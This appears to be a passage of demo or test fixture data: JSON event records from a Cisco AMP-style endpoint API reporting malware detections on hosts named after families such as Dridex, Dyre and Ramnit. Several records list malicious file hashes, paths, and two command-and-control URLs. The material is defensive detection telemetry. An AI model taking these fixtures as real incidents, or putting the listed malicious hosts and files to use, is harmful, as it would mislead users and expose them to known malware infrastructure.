Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156208003834970125","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292743539720000,"timestamp":1610704858,"timestamp_nanoseconds":969000000,"date":"2021-01-15T10:00:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","detection_id":"6156292734949785601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"},"parent":{"process_id":3660,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254780868919000,"timestamp":1610704856,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:00:56+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176254780868919310","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832363247763718000,"timestamp":1610704849,"timestamp_nanoseconds":734000000,"date":"2021-01-15T10:00:49+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2457,"scanned_processes":40,"scanned_paths":0,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254733624279000,"timestamp":1610704845,"timestamp_nanoseconds":320000000,"date":"2021-01-15T10:00:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176254733624279053","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207939410461000,"timestamp":1610704844,"timestamp_nanoseconds":773000000,"date":"2021-01-15T10:00:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207939410460684","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832265962459496000,"timestamp":1610704840,"timestamp_nanoseconds":622000000,"date":"2021-01-15T10:00:40+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":1460,"scanned_processes":24,"scanned_paths":0,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6532892466943623000,"timestamp":1610704839,"timestamp_nanoseconds":336000000,"date":"2021-01-15T10:00:39+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2280,"scanned_processes":41,"scanned_paths":0,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207909345690000,"timestamp":1610704837,"timestamp_nanoseconds":4000000,"date":"2021-01-15T10:00:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207909345689611","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955899987000600,"timestamp":1610704833,"timestamp_nanoseconds":987000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.Ramnit.A","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704833,"start_date":"2021-01-15T10:00:33+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c"},"parent":{"disposition":"Clean","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659320741233000,"timestamp":1610704833,"timestamp_nanoseconds":225000000,"date":"2021-01-15T10:00:33+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826659320741232644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"dirty_url":"http://benhomelandefit.com/rssnews.php","remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1095,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":2800,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659320741233000,"timestamp":1610704833,"timestamp_nanoseconds":132000000,"date":"2021-01-15T10:00:33+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826659320741232643","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1095,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":2800,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254682084671000,"timestamp":1610704833,"timestamp_nanoseconds":542000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176254682084671500","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254682084671000,"timestamp":1610704833,"timestamp_nanoseconds":526000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176254682084671499","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254682084671000,"timestamp":1610704833,"timestamp_nanoseconds":370000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176254682084671498","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254682084671000,"timestamp":1610704833,"timestamp_nanoseconds":261000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254682084671497","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254682084671000,"timestamp":1610704833,"timestamp_nanoseconds":214000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254682084671496","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663807451562000,"timestamp":1610704833,"timestamp_nanoseconds":173000000,"date":"2021-01-15T10:00:33+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663807451561998","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iiwswemtokwvoomr.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\iiwswemtokwvoomr.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659316446265000,"timestamp":1610704832,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:00:32+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826659316446265346","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"dirty_url":"http://sovereutilizeignty.com/rssnews.php","remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1093,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":2800,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659316446265000,"timestamp":1610704832,"timestamp_nanoseconds":835000000,"date":"2021-01-15T10:00:32+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826659316446265345","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1093,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":2800,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":918000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704199","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"},"parent":{"process_id":2492,"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":902000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704198","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","file_path":"\\\\?\\C:\\drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":871000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat 